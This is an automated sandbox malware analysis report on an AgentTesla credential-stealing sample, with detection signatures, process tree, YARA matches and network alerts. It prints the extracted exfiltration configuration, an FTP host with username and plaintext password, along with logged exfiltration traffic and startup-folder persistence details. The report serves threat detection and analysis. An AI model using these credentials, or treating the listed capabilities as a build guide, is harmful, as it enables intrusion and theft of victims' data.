
Windows Analysis Report
XoRPyi5s1i.exe

Overview

General Information

Sample name: XoRPyi5s1i.exe (renamed because the original name is a hash value)
Original sample name: 811c8854ea3adcd1259c28cf1dc60e0a0a2f7a44f463e98f77c277a2a2f6394b.exe
Analysis ID: 1587765
MD5: fc76d8b178c0aa094eba5fea74e82614
SHA1: f2f88413e1e3aed4fd731769037c3d2391d29c94
SHA256: 811c8854ea3adcd1259c28cf1dc60e0a0a2f7a44f463e98f77c277a2a2f6394b
Tags: exe, Formbook, user-adrian__luca

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • XoRPyi5s1i.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\XoRPyi5s1i.exe" MD5: FC76D8B178C0AA094EBA5FEA74E82614)
    • unjuridically.exe (PID: 1936 cmdline: "C:\Users\user\Desktop\XoRPyi5s1i.exe" MD5: FC76D8B178C0AA094EBA5FEA74E82614)
      • RegSvcs.exe (PID: 1712 cmdline: "C:\Users\user\Desktop\XoRPyi5s1i.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 4908 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • unjuridically.exe (PID: 5328 cmdline: "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" MD5: FC76D8B178C0AA094EBA5FEA74E82614)
      • RegSvcs.exe (PID: 6796 cmdline: "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware configuration: {"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author
00000003.00000002.1759111778.000000000264E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000007.00000002.2847350109.00000000031AE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(table truncated; 23 entries in the full report)

Source | Rule | Description | Author
2.2.unjuridically.exe.f60000.0.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
2.2.unjuridically.exe.f60000.0.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
2.2.unjuridically.exe.f60000.0.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
2.2.unjuridically.exe.f60000.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  Strings:
  • 0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x34ac5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
2.2.unjuridically.exe.f60000.0.raw.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen
  Strings:
  • 0x3196b:$s2: GetPrivateProfileString
  • 0x31018:$s3: get_OSFullName
  • 0x32706:$s5: remove_Key
  • 0x328b3:$s5: remove_Key
  • 0x33795:$s6: FtpWebRequest
  • 0x34717:$s7: logins
  • 0x34c89:$s7: logins
  • 0x3798e:$s7: logins
  • 0x37a4c:$s7: logins
  • 0x393a1:$s7: logins
  • 0x385e6:$s9: 1.85 (Hash, version 2, native byte-order)
(table truncated; 18 entries in the full report)

                    System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , ProcessId: 4908, ProcessName: wscript.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , ProcessId: 4908, ProcessName: wscript.exe

                    Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe, ProcessId: 1936, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs

Suricata IDS alerts for network traffic:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T17:51:38.374886+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.8 | 49711 | 162.241.62.63 | 21 | TCP
2025-01-10T17:51:38.771740+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.8 | 49712 | 162.241.62.63 | 43704 | TCP
2025-01-10T17:51:38.778606+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.8 | 49712 | 162.241.62.63 | 43704 | TCP


                    AV Detection

Source: 2.2.unjuridically.exe.f60000.0.raw.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe; ReversingLabs: Detection: 63%
Source: XoRPyi5s1i.exe; ReversingLabs: Detection: 63%
Source: XoRPyi5s1i.exe; Virustotal: Detection: 74%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe; Joe Sandbox ML: detected
Source: XoRPyi5s1i.exe; Joe Sandbox ML: detected
Source: XoRPyi5s1i.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: Binary string: wntdll.pdbUGP source: unjuridically.exe, 00000002.00000003.1631675992.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.1632600353.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1755427863.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1750972654.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: unjuridically.exe, 00000002.00000003.1631675992.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.1632600353.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1755427863.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1750972654.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe; Code function: 1_2_00176CA9 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00176CA9
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe; Code function: 1_2_001760DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_001760DD
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe; Code function: 1_2_001763F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_001763F9
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe; Code function: 1_2_0017EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0017EB60
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe; Code function: 1_2_0017F56F FindFirstFileW,FindClose,1_2_0017F56F
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe; Code function: 1_2_0017F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0017F5FA
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe; Code function: 1_2_00181B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00181B2F
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe; Code function: 1_2_00181C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00181C8A
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe; Code function: 1_2_00181F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00181F94
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe; Code function: 2_2_01016CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_01016CA9
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe; Code function: 2_2_010160DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_010160DD
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe; Code function: 2_2_010163F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_010163F9
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe; Code function: 2_2_0101EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0101EB60
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe; Code function: 2_2_0101F56F FindFirstFileW,FindClose,2_2_0101F56F
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe; Code function: 2_2_0101F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0101F5FA
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe; Code function: 2_2_01021B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_01021B2F
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe; Code function: 2_2_01021C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_01021C8A
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe; Code function: 2_2_01021F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_01021F94

                    Networking

Source: Network traffic; Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.8:49712 -> 162.241.62.63:43704
Source: Network traffic; Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.8:49711 -> 162.241.62.63:21
Source: Yara match; File source: 2.2.unjuridically.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.unjuridically.exe.1190000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: global traffic; TCP traffic: 192.168.2.8:49712 -> 162.241.62.63:43704
Source: global traffic; TCP traffic: 192.168.2.8:65240 -> 162.159.36.2:53
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 208.95.112.1
Source: Joe Sandbox View; IP Address: 162.241.62.63
Source: Joe Sandbox View; ASN Name: UNIFIEDLAYER-AS-1US
Source: unknown; DNS query: name: ip-api.com
Source: unknown; FTP traffic detected: 162.241.62.63:21 -> 192.168.2.8:49711, server banner:
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 9 of 150 allowed.
  220-Local time is now 10:51. Server port: 21.
  220-IPv6 connections are also welcome on this server.
  220 You will be disconnected after 15 minutes of inactivity.
Source: unknown; TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 occurrences)
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 occurrences)
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe; Code function: 1_2_00184EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,1_2_00184EB5
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
Source: global traffic; DNS traffic detected: DNS query: ip-api.com
Source: global traffic; DNS traffic detected: DNS query: ftp.antoniomayol.com
Source: RegSvcs.exe, 00000003.00000002.1759111778.000000000264E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2847350109.00000000031AE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://antoniomayol.com
Source: RegSvcs.exe, 00000003.00000002.1759111778.000000000264E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2847350109.00000000031AE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ftp.antoniomayol.com
Source: RegSvcs.exe, 00000003.00000002.1759111778.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2847350109.000000000315C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com
Source: unjuridically.exe, 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1756396983.0000000000926000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1759111778.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, unjuridically.exe, 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2847350109.000000000315C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: RegSvcs.exe, 00000003.00000002.1759111778.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2847350109.000000000315C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: unjuridically.exe, 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, unjuridically.exe, 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://account.dyn.com/
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe; Code function: 1_2_00186B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00186B0C
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe; Code function: 1_2_00186D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00186D07
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe; Code function: 2_2_01026D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_01026D07
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe; Code function: 1_2_00172B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,1_2_00172B37
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe; Code function: 1_2_0019F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0019F7FF
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe; Code function: 2_2_0103F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0103F7FF

                    System Summary

                    barindex
                    Source: 2.2.unjuridically.exe.f60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.unjuridically.exe.f60000.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 6.2.unjuridically.exe.1190000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 6.2.unjuridically.exe.1190000.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 2.2.unjuridically.exe.f60000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.unjuridically.exe.f60000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 6.2.unjuridically.exe.1190000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 6.2.unjuridically.exe.1190000.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00133D19: This is a third-party compiled AutoIt script.
Source: XoRPyi5s1i.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: XoRPyi5s1i.exe, 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. [memstr_23812d10-c]
Source: XoRPyi5s1i.exe, 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer [memstr_5f36ba7c-f]
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FD3D19: This is a third-party compiled AutoIt script.
Source: unjuridically.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: unjuridically.exe, 00000002.00000002.1635324675.000000000107E000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. [memstr_6aba3ba6-3]
Source: unjuridically.exe, 00000002.00000002.1635324675.000000000107E000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer [memstr_5b3ab523-2]
Source: unjuridically.exe, 00000006.00000002.1756799947.000000000107E000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. [memstr_1f7fff29-9]
